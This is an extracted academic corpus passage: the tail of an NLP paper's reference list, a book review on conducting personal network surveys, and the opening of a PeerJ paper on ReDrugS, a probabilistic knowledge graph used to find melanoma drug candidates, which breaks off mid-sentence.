Us- ing Natural Language to Annotate Natural Language. In Proceedings of the 2015 Conference on Empirical Methods in Natural Language Processing (EMNLP), pages 643–653, Lisbon, Portugal. Karl Moritz Hermann, Dipanjan Das, Jason Weston, and Kuzman Ganchev. 2014. Semantic Frame Identifica- tion with Distributed Word Representations. In Pro- ceedings of the 52nd Annual Meeting of the Associa- tion for Computational Linguistics (Volume 1: Long Papers), pages 1448–1458, Baltimore, Maryland, USA. Meghana Kshirsagar, Sam Thomson, Nathan Schneider, Jaime Carbonell, Noah A. Smith, and Chris Dyer. 2015. Frame-Semantic Role Labeling with Heterogeneous Annotations. In Proceedings of the 53rd Annual Meet- ing of the Association for Computational Linguistics and the 7th International Joint Conference on Natural Language Processing (Volume 2: Short Papers), pages 218–224, Beijing, China. Sandra Kübler and Desislava Zhekova. 2009. Semi- Supervised Learning for Word Sense Disambiguation: Quality vs. Quantity. In Proceedings of the Inter- national Conference RANLP-2009, pages 197–202, Borovets, Bulgaria. Claudia Leacock, George A. Miller, and Martin Chodorow. 1998. Using Corpus Statistics and WordNet Relations for Sense Identification. Computational Linguistics, 24(1):147–165. Ken Litkowski. 2010. CLR: Linking Events and Their Participants in Discourse Using a Comprehen- sive FrameNet Dictionary. In Proceedings of the 5th International Workshop on Semantic Evaluation (Se- mEval ’10), pages 300–303, Los Angeles, CA, USA. David Martinez. 2008. On the Use of Automatically Acquired Examples for All-Nouns Word Sense Disam- biguation. Journal of Artificial Intelligence Research, 33:79–107. Rada Mihalcea and Dan Moldovan. 1999. An Auto- matic Method for Generating Sense Tagged Corpora. In Proceedings of the American Association for Artifi- cial Intelligence (AAAI 1999), Orlando, Florida, USA. Mike Mintz, Steven Bills, Rion Snow, and Daniel Juraf- sky. 2009. Distant Supervision for Relation Extraction without Labeled Data. In Proceedings of the Joint Con- ference of the 47th Annual Meeting of the ACL and the 4th International Joint Conference on Natural Lan- guage Processing of the AFNLP, pages 1003–1011, Suntec, Singapore. Rebecca J. Passonneau, Collin F. Baker, Christiane Fell- baum, and Nancy Ide. 2012. The MASC Word Sense Corpus. In Proceedings of the Eight International Conference on Language Resources and Evaluation (LREC’12), pages 3025–3030, Istanbul, Turkey. Ellie Pavlick, Juri Ganitkevitch, Tsz Ping Chan, Xuchen Yao, Benjamin Van Durme, and Chris Callison-Burch. 2015. Domain-Specific Paraphrase Extraction. In Pro- ceedings of the 53rd Annual Meeting of the Association for Computational Linguistics and the 7th International Joint Conference on Natural Language Processing (Vol- ume 2: Short Papers), pages 57–62, Beijing, China. Octavian Popescu, Martha Palmer, and Patrick Hanks. 2014. Mapping CPA Patterns onto OntoNotes Senses. In Proceedings of the Ninth International Conference on Language Resources and Evaluation (LREC’14), pages 882–889, Reykjavik, Iceland. Michael Roth and Mirella Lapata. 2015. Context-Aware Frame-Semantic Role Labeling. Transactions of the Association for Computational Linguistics, 3:449–460. Josef Ruppenhofer, Caroline Sporleder, Roser Morante, Collin Baker, and Martha Palmer. 2010. SemEval- 2010 Task 10: Linking Events and Their Participants in Discourse. In Proceedings of the 5th International Workshop on Semantic Evaluation, pages 45–50, Upp- sala, Sweden. Wolfgang Seeker and Jonas Kuhn. 2012. Making Ellipses Explicit in Dependency Conversion for a German Tree- bank. In Nicoletta Calzolari et al., editor, Proceedings of the Eight International Conference on Language Re- sources and Evaluation (LREC’12), pages 3132–3139, Istanbul, Turkey. 212 Lei Shi and Rada Mihalcea. 2004. Open Text Semantic Parsing Using FrameNet and WordNet. In Demon- stration Papers at HLT-NAACL 2004, HLT-NAACL– Demonstrations ’04, pages 19–22, Stroudsburg, PA, USA. Lei Shi and Rada Mihalcea. 2005. Putting Pieces To- gether: Combining FrameNet, VerbNet and WordNet for Robust Semantic Parsing. In Computational Lin- guistics and Intelligent Text Processing, pages 100–111. Springer Berlin Heidelberg. Oscar Täckström, Kuzman Ganchev, and Dipanjan Das. 2015. Efficient Inference and Structured Learning for Semantic Role Labeling. Transactions of the Associa- tion for Computational Linguistics, 3:29–41. Kristian Woodsend and Mirella Lapata. 2014. Text Rewriting Improves Semantic Role Labeling. Journal of Artificial Intelligence Research, 51:133–164. David Yarowsky. 1995. Unsupervised Word Sense Dis- ambiguation Rivaling Supervised Methods. In Pro- ceedings of the 33rd annual meeting on Association for Computational Linguistics, pages 189–196, Cambridge, Massachusetts, USA. Benat Zapirain, Eneko Agirre, Lluis Marquez, and Mi- hai Surdeanu. 2013. Selectional Preferences for Se- mantic Role Classification. Computational Linguistics, 39(3):631–663. 213 214 work_s2b4q3na4rdbllvwo3ogtt3lga ---- © 2020 Authors. This work is licensed under the Creative Commons Attribution 4.0 License (https://creativecommons.org/licenses/by/4.0/) Issue 1 | Vol. 40Article | DOI: 10.21307/connections-2019.015 98 CONNECTIONS Commentary: How to do personal network surveys: from name generators to statistical modeling Isidro Maya-Jariego* Universidad de Sevilla Seville, Andalucía SPAIN. *E-mail: isidromj@us.es Abstract The book “Conducting Personal Network Research” is a conceptual and methodological introduction to the structural study of personal networks. It is part of a series of recent monographs that have begun to systematize the knowledge generated in this area in recent decades (Crossley et al., 2015; McCarty et al., 2019; Perry et al., 2018). In this case, the authors have dedicated a large part of their career to the empirical investigation of the interpersonal relationships, interaction contexts, and social integration processes of immigrants, along with other groups in vulnerable situations. With this publication, all this experience is now reflected in a clear and comprehensive introductory text. This book explains how to integrate relational data collection and analysis with survey research. It systematically presents the strategies to estimate the size of personal networks. Finally, it describes how to fit statistical analysis to relational data, including regression models, multi-level models, and longitudinal models. Keywords Personal Networks, Name generators, Statistical modelling, Network surveys, Ethics in research. The first time I showed the visualization of the personal network to a respondent I had the feeling of being in front of a tool with enormous potential. It was a case of a student who had just adopted a metropolitan lifestyle, moving almost daily between the city where she lived and the capital where she was studying at the university. The analysis of the structural properties of her personal network was a good way to describe the distribution of her relationships (and her life) between different socio- geographic spaces. On the other hand, by presenting the graph of her personal network, the respondent showed some surprise when she discovered some unknown structural properties of her own personal network. The visualization made her aware of some characteristics of her social world, although it had been designed based on the information she had provided. Besides, the graphic representation natu- rally prompted a biographical discourse, providing explanations that helped to understand the contexts of interaction and the life events that had shaped her personal network. Many of the potentials in those first experiences that research has subsequently developed were still at an early stage: the statistical analysis of the structural properties, the development of mixed methods strategies, the incorporation of the study of individual differences, the formulation of personal networks typologies, etc. The book Conducting Personal Network Research is a conceptual and methodological introduction to the structural study of personal networks. It forms part of a series of three new monographs aimed at systematizing the knowledge produced in this area in recent decades (Crossley et al., 2015; McCarty et al., 2019; Perry et al., 2018). In this case, the authors dedicated a large part of their career to empirical research on interpersonal relationships, contexts 99 CONNECTIONS of interaction, and social integration processes of immigrants, along with other groups in situations of vulnerability. In this publication, all this experience is now reflected in a clear and comprehensive introductory text. One part of the book combines survey methodology with the study of personal networks. Accordingly, it presents some basic notions about conducting sampling, how to ask questions, or which type of statistical analysis can be used at different levels of measurement. This type of content is clearly relevant for conducting surveys in general, and not only to those in which samples of personal networks are obtained. However, they help to understand the integration of personal network modules into surveys. As we will describe below, the main contribution of the book is the systematization of existing knowledge about the collection, analysis, and visualization of personal networks. This book review and commentary is a brief personal assessment of two methodological strategies that have emerged in recent decades as an effective way of analyzing personal networks, in part with the outstanding contribution of the authors of the book. The first of these strategies is the design of a pragmatic procedure to efficiently capture the diversity of personal networks, especially, if we consider the time-consuming nature of handling this type of relational data in surveys. The second is the statistical summary of the structural properties of personal network samples. Among other reasons, because it is common to subsequently use these indicators in statistical analyzes with samples of respondents. Anyway, before going into these two central contributions of the book, I will first provide a short reading guide to the introduction to personal network analysis. A reading guide on personal networks The three books on the study of personal networks previously mentioned have a similar structure. They begin with the description of relational data collection procedures. Next, they present the analysis and visualization strategies of personal network data. Finally, they dedicate several chapters to statistical analysis models. However, as we will do next, we can also highlight some unique characteristics of each of them. Social Network Analysis for Ego-Nets (Crossley et al., 2015) places the study of personal networks in the context of mixed methods and brings it into relation with social theory. It starts with a general introduction to network analysis and explains how ego-networks can also be extracted from whole social networks. Following the tradition of the Manchester School, it presents how to integrate personal network data with qualitative information or with ethnographic strategies. Based on scientific evidence, it presents interesting reflections on the nature of relationships and their mutual dependence on interaction contexts. The section on “narratives, typologies and case studies” is especially suggestive on the very concept of social relationship, as well as its variability depending on the contexts of interaction. Finally, in the chapters on statistical analysis, it follows a formal mathematical approach. Egocentric Network Analysis (Perry et al., 2018) is a book with an eminently pragmatic approach. Sometimes it even goes down to the instrumental level, with instructions on how to carry out the analyzes, or even providing some lines of programming code. It presents the concepts very clearly and illustrates them with a magnificent selection of some of the best studies done in this area. This book clarifies the different analysis strategies to combine egocentric and sociocentric data. It shows with a sociological approach, how personal networks can serve to characterize different types of sociability and different forms of community life. It also describes how short- term, casual, serial relationships with low levels of interpersonal commitment predominate in the contem- porary world. Conducting Personal Network Research (McCarty et al., 2019) is an introductory book on personal network analysis that explains how to integrate relational data collection and analysis with survey research. It systematically presents the strategies to estimate the size of personal networks. Finally, it describes how to fit statistical analysis to relational data, including regression models, multi-level models, and longitudinal models. Consequently, these are three books that complement each other. With these three volumes, the reader can have a comprehensive and updated overview of the study of the structure of personal networks. Below we focus on evaluating two of the fundamental contributions of the book by McCarty et al. (2019) that we anticipated before. Name generators and relations generators The handbook defines itself as “A practical guide.” In that sense, two sections that best respond to the book’s subtitle are focused on “delineating personal networks” (Chapter 6) and “collecting data about ties between alters” (Chapter 8). These are two central methodological strategies in the collection of relational data. Furthermore, both name generators and re- lationship generators have important substantive 100 Commentary: How to do personal network surveys: from name generators to statistical modeling implications, since they refer to the types of social contexts in which the individual is involved, as well as to the nature of the relationships. On the one hand, defining the boundaries of the network impacts the types of social contexts and the types of personal contacts on which we obtain information. On the other hand, for the structure finally observed (and, consequently, for information flows and social support, or social control processes) the type of links is a decisive factor. The work provides a comprehensive classification of the types of name generators. Similarly, it systematically reviews the questions about alters and the relationships among them. The reading shows that this is an area where there is now potential for greater (both conceptual and methodological) systematization regarding data collection. For example, it is common to differentiate whole networks from personal networks (e.g., indicating that the former refers to a bounded group in a predefined context, while the latter covers all the contexts, social circles, and social settings in which the individual participates) Hâncean et al. (2016). On paper, however, nothing is preventing the analysis of whole networks from being applied to two different contexts (e.g. a neighborhood and a workplace simultaneously). The personal network approach can also be adopted in the systematic study of a single interaction context. As an example, we can describe the personal networks of a sample of fishermen limited to their relationships in the fishing port (Maya-Jariego et al., 2016). It is a matter of design. Therefore, taking into account these (less frequent) possibilities can help to specify which elements define (and which do not) the differentiation between the two basic approaches to network analysis. Something similar happens with name generators. It has normally been distinguished between (i) obtaining information about a previously defined list of alters and (ii) obtaining names without any previous suggestion. The originality of the name generator proposed by McCarty (2002) is based on the free recall of respondents, but at the same time requesting a fixed number of alters. It is a rare combination since traditionally free recalling entailed not imposing limits on the number of alters that could be mentioned (Maya-Jariego, 2018). The nature of social relations occupies a central space throughout this process. In practice, the definition of the edge is determinant of the structure of the network. Normally, any subsequent analysis is based on the perception of alter-alter relationships by respondents. Although informants tend to be relatively unreliable when describing social interaction, in the case of personal networks, such accuracy generally increases, partly because these are routine ties with which “ego” has a direct relationship. Additionally, perceived relationships have value in themselves, to the extent that they condition individual behavior. Innovations in the analysis and visualization of personal networks Christopher McCarty published in 2002 an article on the structure of personal networks that established a kind of standard in analysis and visualization strategies, consisting of (i) collecting information on a fixed number of alters, along with the relations that they maintain between them, (ii) disregarding the Ego, and (iii) applying to personal networks the same type of structural analysis that previously was applied to complete social networks (McCarty, 2002). In a way, the book can be read as a compendium of the innovations that have been produced over almost two decades following this scheme. Next, we mention some of the most prominent and promising novelties. Reducing information, cohesive subgroups, and visualization One of the factors that have contributed to the dissemination of this approach among social science researchers is the facility to integrate analysis of personal network samples with traditional statistical analysis models and strategies. Therefore, a large part of the effort has focused on identifying the type of indicators that provide an adequate summary of the structural properties and composition of the network. Both the structural cohesion of the whole and the organization into defined subgroups are two key dimensions. The personal network has proved to be a space that “captures the context” of the respondents (Luke, 2005). On the one hand, it represents the articulation of the social circles in which the individual participates. On the other hand, it indirectly reflects the relationships between the groups that compose this personal environment. Finally, personal networks also have the potential to explore inter-individual differences, through the construction of typologies among other methodological options. In this context, visualization strategies are useful both for collecting personal network data and for developing qualitative interviews, often with a biographical component. They also allow the comparison of personal networks (e.g., through a standardized scheme of clustered graphs). The book has a section of color graphic representations that illustrates the structural and compositional properties 101 CONNECTIONS of personal networks with a fixed number of 30 or more alters. This section shows that visualization is not only a strategy for communicating research results but can easily be combined with qualitative strategies to deepen in Ego’s point of view on relationships. Accuracy, reliability, and statistical models For the rest, some of the classic themes in the study of structural properties are especially well treated, such as the accuracy and reliability of the information obtained, the estimation of the size of personal networks, or the ethics of network research. This is perhaps not surprising, as some of the authors have been especially active in those areas of research. To reduce the respondent burden, empirically validated recommendations are also provided. The book ends with the presentation of the most advanced models of multilevel analysis, which have revolutionized the possibilities of studying personal networks, combining many factors, and allowing the contrast of more complex hypotheses (Snijders et al., 1995; Wellman and Frank, 2001). This section explains how to deal with multicollinearity problems when using multiple regression analysis. This is very practical for some areas of the social sciences where it remains one of the most widely used statistical models. Among others, the relevance of principal component analysis and cluster analysis is reviewed. Finally, the use of Exponential Random Graph Models (ERGMs) and Stochastic Actor-Oriented Models (SAOMs) to examining the formation of alter-alter ties are presented. The book is written in a clear and accessible way. On the one hand, it is suitable for an introductory level, as it presents the concepts from scratch, explains the most common mistakes, and illustrates the contents with examples based on experience. On the other hand, in each chapter, several boxes are included with a selection of particularly relevant research cases in the personal network literature. The latter not only makes reading more entertaining but also offers an enriching picture of some of the most significant findings of recent decades. Among other cases, some studies are presented illustrating how to reach hard-to-reach populations, how to generate networks from a personal diary or from the phone contacts, how to estimate whole networks from personal networks, or how to build typologies. Conclusion The book Conducting Personal Network Research is specially designed for those who approach the study of personal networks for the first time, starting from scratch. However, I think it will also be useful for researchers in the area, allowing them to reflect on how a valuable body of knowledge has been constituted on the structural properties of the social contexts where the individual is integrated. The recent publication of three manuals on the analysis of personal networks (Crossley et al., 2015; McCarty et al., 2019; Perry et al., 2018) involves the consolidation of a collection of methodological innovations that have reinforced the structural ap- proach in the study of personal communities. Without a doubt, this systematization effort will inspire future research. The structure of the personal network is a space in which the relations between groups converge and it comprehensively captures the set of interaction contexts in which the individual participates. As this book shows, the last two decades have served to build a series of models, strategies, and research instruments that will multiply the productivity of this area of study in the coming years. When I come across some of the visualizations that we did in our first studies, now I can only look at them with new eyes. Now we not only have a better understanding of the structure of personal networks but also the research questions have changed. The construction of typologies, the use of hybrid designs (combining personal networks and complete networks), and the improvement of multilevel analysis models are some of the steps that are already guessed along the way. Reviewed by Isidro Maya Jariego, Social Psy chology Department, Universidad de Sevilla, Spain References Crossley, N., Bellotti, E., Edwards, G., Everett, M. G., Koskinen, J. and Tranmer, M. 2015. Social Network Analysis for Ego-nets: Social Network Analysis for Actor-Centred Networks. London: Sage. Hâncean, M. G., Molina, J. L. and Lubbers, M. J. 2016. Recent advancements, developments and applications of personal network analysis. International Review of Social Research 6(4): 137–45. Luke, D. A. 2005. Getting the big picture in community science: methods that capture context. American Journal of Community Psychology 35(3-4): 185–200. McCarty, C. 2002. Structure in personal networks. Journal of Social Structure 3(1): 20. McCarty, C., Lubbers, M. J., Vacca, R. and Molina, J. L. 2019. Conducting Personal Network Research: A Practical Guide. New York: Guilford Publications, 270pp. 102 Commentary: How to do personal network surveys: from name generators to statistical modeling Maya-Jariego, I. 2018. Why name generators with a fixed number of alters may be a pragmatic option for personal network analysis. American Journal of Community Psychology 62(1-2): 233–38. Maya-Jariego, I., Holgado, D. and Florido, D. 2016. Relations between professional groups in the Atlantic and Mediterranean fishing enclaves of Andalusia (Spain): a personal networks approach with clustered graphs. Marine Policy 72: 48–58. Perry, B. L., Pescosolido, B. A. and Borgatti, S. P. 2018. Egocentric Network Analysis: Foundations, Methods, and Models (Vol. 44). Cambridge: Cambridge University Press. Snijders, T., Spreen, M. and Zwaagstra, R. 1995. The use of multilevel modeling for analysing personal networks: networks of cocaine users in an urban area. Journal of Quantitative Anthropology 5(2): 85–105. Wellman, B. and Frank, K. 2001. “Network capital in a multi-level world: Getting support from personal communities”, in Lin, N., Coook, K. S. and Burt, R. (Eds), Social Capital: Theory and Research Transaction, Piscataway, NJ, 233–73. work_s2x6fjbeyvbsvnhwqctlx4ajde ---- Finding melanoma drugs through a probabilistic knowledge graph Finding melanoma drugs through a probabilistic knowledge graph James P. McCusker1, Michel Dumontier2, Rui Yan1, Sylvia He1, Jonathan S. Dordick3,4 and Deborah L. McGuinness1,4 1 Department of Computer Science, Rensselaer Polytechnic Institute, Troy, NY, USA 2 Stanford Center for Biomedical Informatics Research, Stanford University School of Medicine, Stanford, CA, USA 3 Department of Chemical & Biological Engineering, Rensselaer Polytechnic Institute, Troy, NY, USA 4 Center for Biotechnology & Interdisciplinary Studies, Rensselaer Polytechnic Institute, Troy, NY, USA ABSTRACT Metastatic cutaneous melanoma is an aggressive skin cancer with some progression- slowing treatments but no known cure. The omics data explosion has created many possible drug candidates; however, filtering criteria remain challenging, and systems biology approaches have become fragmented with many disconnected databases. Using drug, protein and disease interactions, we built an evidence-weighted knowledge graph of integrated interactions. Our knowledge graph-based system, ReDrugS, can be used via an application programming interface or web interface, and has generated 25 high-quality melanoma drug candidates. We show that probabilistic analysis of systems biology graphs increases drug candidate quality compared to non-probabilistic methods. Four of the 25 candidates are novel therapies, three of which have been tested with other cancers. All other candidates have current or completed clinical trials, or have been studied in in vivo or in vitro. This approach can be used to identify candidate therapies for use in research or personalized medicine. Subjects Bioinformatics, Computational Biology, Data Science, World Wide Web and Web Science Keywords Melanoma, Knowledge graphs, Drug repositioning, Uncertainty reasoning INTRODUCTION Metastatic cutaneous melanoma is an aggressive cancer of the skin with low prevalence but very high mortality rate, with an estimated 5-year survival rate of 6% (Barth, Wanek & Morton, 1995). There are currently no known therapies that can consistently cure metastatic melanoma. Vemurafenib is effective against BRAF mutant melanomas (Chapman et al., 2011) but resistant cells often result in recurrence of metastases (Le et al., 2013). Melanoma itself may be best approached based on the individual genetics of the tumor, as it has been shown to involve mutations in many different genes to produce the same disease (Krauthammer et al., 2015). Because of this, an individualized approach may be necessary to find effective treatments. Drug repurposing, or the discovery of new uses for existing approved drugs, can often lead to effective new treatments for diseases. A wide range of computational methods have been developed in support of drug repositioning. Computational approaches (Sanseau & Koehler, 2011) include topic modeling (Bisgin et al., 2012, 2014), side-effect How to cite this article McCusker et al. (2017), Finding melanoma drugs through a probabilistic knowledge graph. PeerJ Comput. Sci. 3:e106; DOI 10.7717/peerj-cs.106 Submitted 27 April 2016 Accepted 27 December 2016 Published 13 February 2017 Corresponding authors James P. McCusker, mccusj@cs.rpi.edu Deborah L. McGuinness, dlm@cs.rpi.edu Academic editor Yonghong Peng Additional Information and Declarations can be found on page 14 DOI 10.7717/peerj-cs.106 Copyright 2017 McCusker et al. Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.106 mailto:mccusj@�cs.�rpi.�edu mailto:dlm@�cs.�rpi.�edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.106 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ similarity (Yang & Agarwal, 2011; Ye, Liu & Wei, 2014), drug and/or disease similarity (Chiang & Butte, 2009; Gottlieb et al., 2011), genome-wide association studies (Kingsmore et al., 2008; Grover et al., 2014), and gene expression (Lamb et al., 2006; Sirota et al., 2011). Systems biology has also provided a number of network analysis approaches (Yang & Agarwal, 2011; Wu, Wang & Chen, 2013; Cheng et al., 2012; Emig et al., 2013; Harrold, Ramanathan & Mager, 2013; Wu et al., 2013; Vogt, Prinz & Campillos, 2014) but the field has been limited by a fragmentation of databases. Most systems biology databases are not aligned with each other, and typically leave out crucial information about how other biological entities, like drugs and diseases, interact with the systems biology graph. Further, while some interaction databases provide human curation and validation of pathway interactions, and others provide experimental evidence for the recorded interactions, there has not yet been, to our knowledge, a resource that combines the two approaches and quantifies the reliability of the evidence used to assert the interactions. A knowledge graph is a compilation of facts and figures that can be used to provide contextual meaning to searches. Google is using knowledge graphs to improve its search and to analyze the information graph of the web; Facebook is using them to analyze the social graph. We built our knowledge graph with the goal of unifying large parts of biomedical domain knowledge for both mining and interactive exploration related to drugs, diseases, and proteins. Our knowledge graph is enhanced by the provenance of each fragment of knowledge captured, which is used to compute the confidence probabilities for each of those fragments. Further, we use open standards from the world wide web consortium (W3C), including the resource description framework (RDF) (Richard, David & Markus, 2014), web ontology language (OWL) (Motik, Patel-Schneider & Cuenca Grau, 2009), and SPARQL (Harris, Seaborne & Prud’hommeaux, 2013). The representation of the knowledge in our knowledge graph is aligned with best practice vocabularies and ontologies from the W3C and the biomedical community, including the provenance ontology (PROV-O) (Lebo, Sahoo & McGuinness, 2013), the HUPO proteomics standards initiative molecular interactions (PSI-MI) ontology (Hermjakob et al., 2004), and the semanticscience integrated ontology (SIO) (Dumontier et al., 2014). Use of these standards, vocabularies, and ontologies make it simple for ReDrugS to integrate with other similar efforts in the future with minimal effort. We proposed and built a novel computational drug repositioning platform, that we refer to as ReDrugS, that applies probabilistic filtering over individually-supported assertions drawn from multiple databases pertaining to systems biology, pharmacology, disease association, and gene expression data. We use our platform to identify novel and known drugs for melanoma. RESULTS We used ReDrugS to examine the drug–target–disease network and identify known, novel, and well supported melanoma drugs. The ReDrugS knowledge base contained 6,180 drugs, 3,820 diseases, 69,279 proteins, and 899,198 interactions. The drugs included in ReDrugS follow the distribution by the Anatomic Therapeutic Classification (ATC) categories shown in Fig. 1. McCusker et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.106 2/20 http://dx.doi.org/10.7717/peerj-cs.106 https://peerj.com/computer-science/ We examined drug and gene connections that were three or less interaction steps from melanoma, and additionally filtered interactions with a joint probability greater or equal to 0.93. We identified 25 drugs in the resulting drug–gene–disease network surrounding melanoma as illustrated in Fig. 2. We then validated the set of 25 drugs by determining their position in the drug discovery pipeline for melanoma. Table 1 shows that nearly all drugs uncovered by ReDrugS were previously been identified as potential melanoma therapies either in clinical trials or in vivo or in vitro. Of the 25 drugs, 12 have been in Phase I, II, or III clinical trials, five have been studied in vitro, four in vivo, one was investigated as a case study, and three are novel. To further evaluate our system, we examined the impact of decreasing the joint probability or increasing the number of interaction steps. Figures 3A and 3B show precision, recall, and f-measure curves while varying each parameter. Using these information retrieval performance curves, we found that using a joint probability of 0.93 or greater with three or less interaction steps maximizes the precision and recall as shown in Fig. 3. By performing a sampled literature search on hypothesis candidates with a joint probability of 0.5 or higher and six or fewer interaction steps, we were able to generate precision, recall, and f-measure curves for both cutoffs to find our cutoff of 0.93 with three or fewer interaction steps. The precision, recall, and f-measure curves are shown for varying joint probability thresholds in Fig. 3A and for varying interaction step counts in Fig. 3B. Figure 1 Percentage approved drugs in each of the categories of the anatomic therapeutic classification (ATC) system. McCusker et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.106 3/20 http://dx.doi.org/10.7717/peerj-cs.106 https://peerj.com/computer-science/ DISCUSSION We designed ReDrugS to quickly and automatically integrate and filter a heterogeneous biomedical knowledge graph to generate high-confidence drug repositioning candidates. Our results indicate that ReDrugs generates clinically plausible drug candidates, in which half are in various stages of clinical trials, while others are novel or are being investigated in pre-clinical studies. By helping to consolidate the three main datatypes—drug targets, protein interactions, and disease genes—ReDrugs can amplify the ability of researchers to filter the vast amount of information into those that are relevant for drug discovery. Candidate significance Three drugs were identified that have not previously been studied for melanoma treatment. Framycetin, a CXCR4 inhibitor, has not previously been considered for melanoma treatment. While it is nephrotoxic when administered orally (Greenberg, 1965), it is used topically as an antibacterial treatment. While it may not be of use for metastasis, it might serve as a simple, inexpensive prophylactic treatment after excision of primary tumors. Additionally, Lucanthone and Podofilox were identified as having potential effects on melanoma through CDKN2A and MAP kinase, respectively. Figure 2 The interaction graph of predicted melanoma drugs with a probability of 0.93 or higher and have three or fewer intervening interactions between drug and disease. The “Explore” tab contains the controls to expand the network in various ways, including the filtering parameters. Node and edge detail tabs provide additional information about the selected node or edge, including the probabilities of the edges selected. Users can control the layout algorithm and related options using the “Options” tab. McCusker et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.106 4/20 http://dx.doi.org/10.7717/peerj-cs.106 https://peerj.com/computer-science/ One drug we identified, Vemurafenib, is approved for treatment of late stage melanoma has been shown to inhibit the BRAF protein in BRAF-V600 mutant melanomas (Chapman et al., 2011). However, cells can become resistant to Vemurafenib, thereby leading to metastasis (Le et al., 2013). A number of the drugs we identified are in clinical trials for treatment of melanoma. We identified BRAF-oriented drugs, Dabrafenib (Hauschild et al., 2012), Sorafenib (National Cancer Institute, 2005), and Regorafenib (Istituto Clinico Humanitas, 2015), that have been evaluated in clinical trials, but have not yet been approved. Zidovudine or Azidothymidine is a TERT inhibitor that has shown significant melanoma tumor reductions in mouse models (Humer et al., 2008). Three MAP kinase-related compounds, Vinblastine (Luikart, Kennealey & Kirkwood, 1984), Trametinib (Kim et al., 2012), and Vinorelbine (Whitehead et al., 2004) were identified that are in clinical trials for melanoma treatment. CDKN2A was another popular target, as Irinotecan (Fiorentini et al., 2009), Table 1 Drug discovery status for 25 drug candidates identified using ReDrugS. Status Drug Pathway Steps Joint p Approved Vemurafenib (Chapman et al., 2011) BRAF 2 0.98 Phase III Dabrafenib (Hauschild et al., 2012) BRAF 2 0.98 Sorafenib (National Cancer Institute, 2005) BRAF 2 0.98 Vinblastine (Luikart, Kennealey & Kirkwood, 1984) MAP kinase 3 0.93 Phase II Zidovudine (Humer et al., 2008) TERT 2 0.98 Trametinib (Kim et al., 2012) MAP kinase 2 0.98 Regorafenib (Istituto Clinico Humanitas, 2015) BRAF 2 0.98 Nadroparin (Nagy, Turcsik & Blaskó, 2009) MYC 3 0.97 Vinorelbine (Whitehead et al., 2004) MAP kinase 3 0.93 Irinotecan (Fiorentini et al., 2009) CDKN2A 3 0.93 Topotecan (Kraut et al., 1997) CDKN2A 3 0.93 Phase I Sodium stibogluconate (Naing, 2011) CDKN2A 3 0.93 Case study Ingenol mebutate (Mansuy et al., 2014) PRKCA/BRAF 3 0.95 In vitro Bosutinib (Homsi et al., 2009) MAP kinase 2 0.98 Purvalanol (Smalley et al., 2007) MAP kinase/TP53 3 0.97 Ellagic acid (Kim et al., 2008) PRKCA/BRAF 3 0.95 Albendazole (Patel et al., 2011) CDKN2A 3 0.93 Colchicine (Lemontt, Azzaria & Gros, 1988) MAP kinase 3 0.93 In vivo Plerixafor (D’Alterio et al., 2012) CXCR4 3 0.97 Vincristine (Sawada et al., 2004) MAP kinase 3 0.93 L-Methionine (Clavo & Wahl, 1996) CDKN2A 3 0.93 Mebendazole (Doudican et al., 2008) CDKN2A 3 0.93 Novel Framycetin CXCR4 3 0.97 Lucanthone CDKN2A 3 0.93 Podofilox MAP kinase 3 0.93 Note: “Pathway” refers to the target or pathway that the drug acts on. “Steps” is distance in number of interactions between the drug and the disease, and “Joint p” is the joint probability that all of those interactions occur. McCusker et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.106 5/20 http://dx.doi.org/10.7717/peerj-cs.106 https://peerj.com/computer-science/ Topotecan (Kraut et al., 1997), and Sodium stibogluconate (Naing, 2011) are all drugs in clinical trial that we identified as potential therapies. Many other drugs were identified that are being studied in the lab. Additional drugs were identified that target the MAP kinase pathway, including Bosutinib (Homsi et al., 2009), Purvalanol (Smalley et al., 2007), Colchicine (Lemontt, Azzaria & Gros, 1988), and Vincristine (Sawada et al., 2004). Podofilox has not yet been investigated in melanoma treatments, but preliminary investigations have focused on treating chronic lymphocytic leukemia (Shen et al., 2013) and non-small cell lung cancer (Peng et al., 2014). Since these drugs attack MAPK2 and related proteins rather than BRAF or NRAS, they can potentially synergize with other treatments (Homsi et al., 2009). Bosutinib in particular has been investigated as a synergistic treatment for melanoma (Held et al., 2012). Another possible treatment pathway is CXCR4 inhibition. Mouse models suggest that CXCR4 inhibitors like Plerixafor can reduce tumor metastasis and primary tumor growth (D’Alterio et al., 2012). We identify both Plerixafor and Framycetin (Neomycin B) as useful CXCR4 inhibitors. Two PKRCA activators, Ingenol mebutate and Ellagic acid, were also identified. PKRCA binds with BRAF (Pardo et al., 2006), but it is mechanistically unclear how PKRCA activation would result in treatment of melanoma. A number of other therapies are also notable. Purvalenol can inhibit GSK3b, which in turn activates TP53. Some, but not all, melanomas have TP53 deactivation (Smalley et al., 2007). Nadroparin, a MYC inhibitor, may inhibit tumor progression (Nagy, Turcsik & Blaskó, 2009). More broadly, heparins can potentially inhibit the metastatic process in melanoma and other cancers (Maraveyas et al., 2010). (A) Information Retrieval by Probability Threshold(A) Information Retrieval by Probability Threshold 0.90.9 0.0.0.8 0.0.0.7 0.0.0.6 0.250.250.25 0.50.50.5 0.750.750.75 precisionprecision recallrecall f-measuref-measure (B) Information Retrieval by Network Expansion Step(B) Information Retrieval by Network Expansion Step 33 444 555 .250.25 .50.5 .750.75 precisionprecision recallrecall f-measuref-measure Figure 3 Precision,recall, and f-measure by(A) varyingthresholds forjoint probability and (B) varying number of interaction steps.Precision is the percentage of returned candidates that have been validated experimentally or have been in a clinical trial (a “hit”) versus all candidates returned. Recall is the percentage of all known validated “hits.” f-Measure is the geometric mean of precision and recall that provides a balanced evaluation of the quality and completeness of the results. McCusker et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.106 6/20 http://dx.doi.org/10.7717/peerj-cs.106 https://peerj.com/computer-science/ The approach that we present here offers a novel, mechanism-focused exploration to identify and examine drugs and targets related to cancer. This approach filters our noisy or poorly supported parts of the knowledge graph to identify more confident mechanisms between drugs, targets, and diseases. Thus, our approach can be used to explore high confidence associations that are produced as a result of 